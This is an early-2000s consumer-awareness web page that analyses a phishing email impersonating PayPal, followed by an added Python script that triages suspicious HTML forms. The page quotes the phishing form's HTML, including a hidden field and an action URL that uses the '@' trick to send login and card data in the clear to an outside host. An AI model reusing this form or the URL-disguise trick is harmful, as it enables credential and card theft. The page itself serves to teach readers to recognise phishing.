In May of 2003 we received a letter from PayPal requesting that we verify our account to ensure our service could continue. On the surface this seems like a reasonable request. Please read our comments alongside each part of the letter. Some of the problems with this letter are obvious, but some are very subtle.

We have received several additional mailings since this page was produced. Each of these had different opt-out messages, but otherwise they were almost identical. It took several months for the media to pick up on this.

In December 2003 we received another note supposedly from PayPal. Apparently someone is reading the Web and magazine articles and listening to the radio, because they have addressed many of our concerns in their latest scam. Click here to read that story.
From: Paysecurity <paysecurity@paypal.com>
Date: Saturday, May 24, 2003 5:26 PM
To: < our e-mail address >
Subject: Dear PayPal Customer

This looks like an official letter from PayPal, although we have no way of knowing if "PaySecurity" is a valid mailbox.

It took us only five minutes to re-create the look of this letter using PayPal's logo and the blue graphic. The Verdana font, and the shaded gray text at the bottom, further imitate PayPal's look.
Dear PayPal Customer

This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes. The inactive customers are subject to restriction and removal in the next 3 months. Please confirm your e-mail address and Credit Card info number by logging in to your PayPal account using the form below:

It costs little, if anything, to maintain a dormant account. Dropping an inactive user means the potential loss of revenue. No reputable financial institution will ask you to verify your private information in this manner.

There are several major problems with this form:
1. PayPal uses your e-mail account as your user ID.
2. Never give out your password to anyone, ever! Your user ID and password allow full access to your account.
3. PayPal should have your credit card information on file. This information will allow someone to make on-line purchases.
4. Your PIN is being requested. Banks will never ask you for this number.
5. Clicking "Log In" will send your private information via an unsecured server.
This notification expires May 31, 2003
Thanks for using PayPal!

The expiration date lends a sense of urgency to the request.
This notification was indeed "sent to our mailbox"; however, this is not the mailbox PayPal has on record. This is supposed to be an urgent letter to PayPal's clients, not a "newsletter or product update".

This is supposed to be a business letter to PayPal's clients. If so, why does it include an "opt out" from receiving product offerings and solicitations from Providian National Bank?

Why does this letter carry a copyright notice? Why is the date 2002 when it was sent in May 2003?
This letter is asking us to send private information through an unsecured site. Mail servers and standard HTTP:// Web sites are not secure for financial transactions. Secure sites have a name starting with HTTPS:// (note the S). This information is being sent in the clear and is therefore subject to being captured and misused.

So, how could a reputable company like PayPal make so many foolish blunders? Our guess is that they didn't. We wrote to PayPal about this letter and received the reply reproduced below. Our suspicion that this is a scam was confirmed by the second paragraph.
Thank you for bringing this incident of suspicious activity to our attention. PayPal will investigate this activity immediately and contact you further if any additional information is required. We appreciate your concern and thank you for making PayPal the most trusted online payment service.

PayPal and its representatives will NEVER ask you to reveal your password. There are NO EXCEPTIONS to this policy. If anyone claiming to work for PayPal asks for your password under any circumstances, by email or by phone, please refuse and immediately contact us via webform at https://www.paypal.com/wf/f=sa_pass.
The purpose of this letter becomes more apparent if you analyze the code for the form used in the letter. When you click the "Log In" button at the bottom of the form you will send the name and value for each of the six fields in the form. The important parts of two of those fields are shown below. Note that the ID field is a seventh, "hidden" field that you will not see but that will be sent nonetheless.

<input name="full_name" type="text" size="30" maxlength="32">
<input name="ID" type="hidden" size="30" maxlength="32" value="n8h4hnew">

When you click on the "Log In" button you will send the form with the six fields you entered, plus the hidden field, to the address listed in the "form action" below. Although the address begins with www.paypal.com, everything before the "@" is treated as a user name rather than a host name, so the browser actually connects to superspeed.port5.com. Your private information will be going to this unsecured site, where a script on the page will do something with it. The follow-up note we received from PayPal, reproduced below, explains what is probably happening.

<form action="http://www.paypal.com@superspeed.port5.com/000.php" method="get">
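The form analysis above, and the earlier point about HTTP versus HTTPS, can be turned into a small triage script. The following is an added example written for this page, not code from the original article or from PayPal. It parses the form, lists every field the browser will submit (hidden ones included), resolves the host the action URL really points to, and flags the transport problems. The sample form is constructed around the two fragments quoted above; the "email" and "password" field names are assumptions standing in for the letter's remaining inputs, and only the Python standard library is used.

```python
"""Triage of a suspicious HTML form: enumerate every field the browser will
submit, resolve the real destination host, and flag transport problems.
Added example using only the standard library; not code from the page."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample built around the two fragments quoted on the page
# (the <form action=...> tag and the full_name / ID inputs). The "email"
# and "password" inputs are assumptions, not taken from the letter.
SAMPLE_FORM = """
<form action="http://www.paypal.com@superspeed.port5.com/000.php" method="get">
  <input name="full_name" type="text" size="30" maxlength="32">
  <input name="email" type="text" size="30" maxlength="32">
  <input name="password" type="password" size="30" maxlength="32">
  <input name="ID" type="hidden" size="30" maxlength="32" value="n8h4hnew">
  <input type="submit" value="Log In">
</form>
"""


class FormCollector(HTMLParser):
    """Record each <form>'s action/method and the <input> tags inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append({"name": a.get("name"),
                                            "type": (a.get("type") or "text").lower(),
                                            "value": a.get("value")})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def parse_forms(html):
    """Return a list of form dicts found in the HTML fragment."""
    collector = FormCollector()
    collector.feed(html)
    return collector.forms


def real_host(url):
    """Host the browser actually connects to. Anything before '@' in the
    authority is userinfo (a login name), not the host, so
    http://www.paypal.com@superspeed.port5.com/ goes to superspeed.port5.com."""
    return (urlsplit(url).hostname or "").lower()


def submitted_names(form):
    """Names sent on submit: every named input, visible or hidden."""
    return [f["name"] for f in form["fields"] if f["name"]]


def analyze_form(form, expected_domain):
    """Return the real destination and a list of findings for one form."""
    parts = urlsplit(form["action"])
    host = real_host(form["action"])
    findings = []
    if parts.username is not None:
        findings.append("userinfo %r before '@' disguises the real host %s"
                        % (parts.username, host))
    if host != expected_domain and not host.endswith("." + expected_domain):
        findings.append("action host %s is not %s" % (host, expected_domain))
    if parts.scheme != "https":
        findings.append("scheme %s: fields travel in the clear" % parts.scheme)
    if form["method"] == "get":
        findings.append("method=get: submitted values end up in the URL, "
                        "hence in server, proxy and browser-history logs")
    for f in form["fields"]:
        if f["type"] == "hidden":
            findings.append("hidden field %s=%r is submitted unseen"
                            % (f["name"], f["value"]))
        elif f["type"] == "password":
            findings.append("password field %r is collected by a non-%s host"
                            % (f["name"], expected_domain))
    return {"host": host, "submitted": submitted_names(form), "findings": findings}


if __name__ == "__main__":
    for form in parse_forms(SAMPLE_FORM):
        report = analyze_form(form, "paypal.com")
        print("submits", report["submitted"], "to", report["host"])
        for line in report["findings"]:
            print(" -", line)
```

Run it as a script to see the report for the sample form; `real_host` is the piece worth reusing on its own, since a visual check of the address bar or of the URL text is exactly what the "@" trick defeats.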
PayPal's referral program is meant to encourage people to introduce the benefits of PayPal to their friends and family, and to people they transact with online. It is not intended to encourage spam. We apologize for this inconvenience and appreciate your report.
PayPal has a program whereby they will pay you $5 to refer a friend or associate who uses their service. It appears that for each response to this e-mail someone stands to pocket $5. Perhaps having someone steal $5 from PayPal is not important to you. Perhaps having someone gain access to your credit card information, including its PIN, is!

Is this spam a scam? Our guess is that it is.

Beware of similar scams "from" other reputable companies, such as eBay, that ask for personal identification or that try to install software.

For example, one letter "from" Microsoft offers to update the security of your computer to the latest level. If you open the attached file you will send the letter to the people on your mailing list, not to mention fouling up your computer. Microsoft (and most companies) will never send out patches by e-mail. They may send you a link to their update page, but they will never send you files.